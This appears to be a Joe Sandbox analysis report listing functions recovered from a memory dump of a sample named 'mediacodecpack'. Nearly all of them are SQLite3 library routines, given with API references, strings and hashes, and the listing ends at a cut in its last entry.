• sqlite3_result_text.SQLITE3 ref: 6091B5A3
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
• String ID:
• API String ID: 2352520524-0
• Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
• Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
• Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
• Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
APIs
  • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
  • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
  • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
• sqlite3_exec.SQLITE3 ref: 6096A4D7
  • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
• sqlite3_result_text.SQLITE3 ref: 6096A5D3
  • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
  • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
  • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
• sqlite3_exec.SQLITE3 ref: 6096A523
• sqlite3_exec.SQLITE3 ref: 6096A554
• sqlite3_exec.SQLITE3 ref: 6096A57F
• sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
Strings
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
• String ID: optimize
• API String ID: 3659050757-3797040228
• Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
• Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
• Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
• Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
APIs
• sqlite3_column_blob.SQLITE3 ref: 609654FB
• sqlite3_column_bytes.SQLITE3 ref: 60965510
• sqlite3_reset.SQLITE3 ref: 60965556
• sqlite3_reset.SQLITE3 ref: 609655B8
  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
• sqlite3_malloc.SQLITE3 ref: 60965655
• sqlite3_free.SQLITE3 ref: 60965714
• sqlite3_free.SQLITE3 ref: 6096574B
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_free.SQLITE3 ref: 609657AA
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
• String ID:
• API String ID: 2722129401-0
• Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
• Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
• Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
• Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                          • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                        • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                          • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                        • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                        • sqlite3_free.SQLITE3 ref: 60964783
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                                        • String ID:
                                                                                        • API String ID: 571598680-0
                                                                                        APIs
                                                                                        • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                          • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                        • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                        • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                        • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                        • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                        • sqlite3_free.SQLITE3 ref: 60963621
                                                                                        Similarity
                                                                                        • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                        • String ID:
                                                                                        • API String ID: 4276469440-0
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                        Strings
                                                                                        • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                        • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                        • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                        • API String ID: 4080917175-264706735
                                                                                        APIs
                                                                                          • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                        • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                        • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: library routine called out of sequence$out of memory
                                                                                        • API String ID: 2019783549-3029887290
                                                                                        APIs
                                                                                        • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                          • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                        • sqlite3_free.SQLITE3 ref: 609406F7
                                                                                        • sqlite3_free.SQLITE3 ref: 60940705
                                                                                        • sqlite3_free.SQLITE3 ref: 60940713
                                                                                        • sqlite3_free.SQLITE3 ref: 6094071E
                                                                                        • sqlite3_free.SQLITE3 ref: 60940729
                                                                                        • sqlite3_free.SQLITE3 ref: 6094073C
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                                                        • String ID:
                                                                                        • API String ID: 1159759059-0
                                                                                        APIs
                                                                                        • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                          • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                        • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                        • String ID: List of tree roots: $d$|
                                                                                        • API String ID: 3709608969-1164703836
                                                                                        APIs
                                                                                          • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                          • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                          • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                          • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                        • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                        • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                        • String ID: e
                                                                                        • API String ID: 786425071-4024072794
                                                                                        Similarity
                                                                                        • API ID: sqlite3_exec
                                                                                        • String ID: sqlite_master$sqlite_temp_master$|
                                                                                        • API String ID: 2141490097-2247242311
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                                                        • String ID:
                                                                                        • API String ID: 3422960571-0
                                                                                        • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                        • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                                                        • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                        • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                                                        APIs
                                                                                          • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                        • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                        • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                          • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                          • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                          • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                          • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID:
                                                                                        • API String ID: 683514883-0
                                                                                        • Opcode ID: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                                        • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                        • Opcode Fuzzy Hash: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                                        • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                        APIs
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                        • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                          • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                          • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                        • String ID:
                                                                                        • API String ID: 1903298374-0
                                                                                        • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                        • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                        • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                        • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                        APIs
                                                                                          • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                        • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                        • String ID:
                                                                                        • API String ID: 1894464702-0
                                                                                        • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                        • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                        • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                        • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                        APIs
                                                                                          • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                        • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                        • sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                        • String ID:
                                                                                        • API String ID: 3336957480-0
                                                                                        • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                        • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                        • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                        • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                        APIs
                                                                                        • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                        • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                        • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                        • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                        Similarity
                                                                                        • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                        • String ID:
                                                                                        • API String ID: 3091402450-0
                                                                                        • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                        • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                        • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                        • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 251237202-0
                                                                                        • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                        • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                        • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                        • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                        APIs
                                                                                        • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                        • String ID:
                                                                                        • API String ID: 4225432645-0
                                                                                        • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                        • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                        • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                        • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                                        • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 251237202-0
                                                                                        • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                        • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                                                        • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                        • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: ($string or blob too big$|
                                                                                        • API String ID: 632333372-2398534278
                                                                                        • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                        • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                        • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                        • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                        APIs
                                                                                        • sqlite3_stricmp.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6094E8D4), ref: 60923675
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp
                                                                                        • String ID: BINARY
                                                                                        • API String ID: 912767213-907554435
                                                                                        • Opcode ID: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                                                        • Instruction ID: 142a1e9d4f1e8552d2c1f4074703eb5ae9f1e70d76b7ded3e689f9c37387bea1
                                                                                        • Opcode Fuzzy Hash: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                                                        • Instruction Fuzzy Hash: 11512AB8A142159FCF05CF68D580A9EBBFBBFA9314F208569D855AB318D335EC41CB90
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Virtual$Protect$Query
                                                                                        • String ID: @
                                                                                        • API String ID: 3618607426-2766056989
                                                                                        • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                        • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                        • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                        • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                          • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                        • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                        • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                        • String ID: d
                                                                                        • API String ID: 211589378-2564639436
                                                                                        • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                        • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                        • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                        • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                        • API String ID: 1646373207-2713375476
                                                                                        • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                        • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                        • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                        • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 2313487548-0
                                                                                        • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                        • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                                        • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                        • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                                        • API String ID: 0-1177837799
                                                                                        • Opcode ID: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                        • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                                        • Opcode Fuzzy Hash: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                        • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                        • String ID:
                                                                                        • API String ID: 1648232842-0
                                                                                        • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                        • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                        • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                        • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                        APIs
                                                                                        • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                        • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                        Similarity
                                                                                        • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 3429445273-0
                                                                                        • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                        • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                        • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                        • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                                        • String ID:
                                                                                        • API String ID: 1035992805-0
                                                                                        • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                        • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                                        • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
